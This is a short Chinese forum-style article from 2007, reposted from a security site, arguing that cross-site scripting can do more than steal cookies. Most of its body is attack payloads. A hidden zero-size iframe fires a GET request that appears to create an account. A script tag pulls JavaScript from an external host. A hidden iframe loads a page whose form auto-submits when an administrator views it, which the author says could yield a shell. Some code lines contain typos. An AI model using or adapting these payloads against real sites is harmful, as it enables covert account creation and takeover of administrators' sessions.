 |
“跨站”之我见 |
|
|
| “跨站”之我见 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 11:24:00 |
|
不知道大家怎么认为跨站攻击的,真的是鸡肋的问题吗?其实跨站不仅仅是偷COOKIES那么简单!看看GET和POST两种提交(允许外部提交的情况)
看看以下的代码(GET):
<iframe src="http://www.20nt.net/add.asp?pass=bin&pass=bin"width="0" height="0" frameborder="0">
</iframe>
如果长度有限制的话可以这写:
<Script url=http://www.20nt.net/bin.js></Script>
js完全可以是外部的!
至于POST的方法我想大家也应该能想到:
<iframe src="http://www.20nt.net/bin.htm" width="0" height="0" frameborder="0"></iframe>
我们在bin.htm可以做一个表单,在表单的尾部加上:
<Scriptlanguage="javascript">this.doctument.form[0].submin()</Script>
当管理员访问到跨站代码的时候就会实现表单的内容.我想如果可以构造的很好的话甚至可以直接得到shell!
如果大家想出了更好的方法可以写出来一起讨论 【转自世纪安全网 http://www.21safe.com】
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: Applet做数字签名,授予访问本地资源
下一篇文章: 迅雷5.0.0.72 广告条移除教程 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
